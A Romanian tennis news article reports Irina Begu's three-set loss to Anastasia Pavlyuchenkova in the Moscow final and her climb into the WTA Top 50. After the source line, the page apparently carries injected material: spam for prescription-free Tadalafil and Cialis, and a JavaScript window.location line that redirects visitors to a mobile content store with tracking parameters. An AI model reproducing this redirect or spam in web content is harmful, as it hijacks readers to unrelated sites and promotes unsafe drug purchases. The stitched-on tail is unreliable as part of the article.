Irina Begu a pierdut finala de la Moscova, însă a făcut cel mai bun turneu al anului

begu

Cu o carieră măcinată de accidentări, Irina Begu (24 de ani) a reușit, în această săptămână, în capitala Rusiei, să arate că locul ei este în primele 50 de jucătoare ale lumii.

Bucureșteanca (61 WTA) va urca în Top 50 în urma finalei de la Moscova, prima pe care a jucat-o în circuitul Premier. Irina Begu a fost învinsă în ultimul act de favorita locală, Anastasia Pavlyuchenkova, al șaselea cap de serie al puternicului turneu din Rusia.

Irina a început destul de ezitant meciul, cedând primul set cu 6-4, însă a strâns din dinți și, în ciuda oboselii, a reușit să împingă meciul în ”decisiv”, impunându-se cu 7-5 în manșa secundă. În ultimul set, Begu n-a mai găsit resursele fizice pentru a se lupta pentru Cupa Kremlinului și a cedat clar, scor 6-1.

Chiar dacă nu a reușit să repete performanța de anul trecut a Simonei Halep, care a plecat cu trofeul de la Moscova, Irina Begu a arătat că ar putea avea un cuvânt de spus în anii următori în tenisul românesc.

O fire foarte competitivă, bucureșteanca a arătat lovituri de înaltă clasă la Moscova, eliminând jucătoare de valoare, precum Makarova sau Safarova.

Pentru participarea în finală, Begu a obţinut 64.000 de dolari şi 305 puncte WTA.

Sursa: www.yahoo.ro buy Tadalafil 20 mg pills online in canada no prescription cheap . Cialis Super Active 20 mg pills prescription overnight delivery by Tadalafil w not prescriptionВ 

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *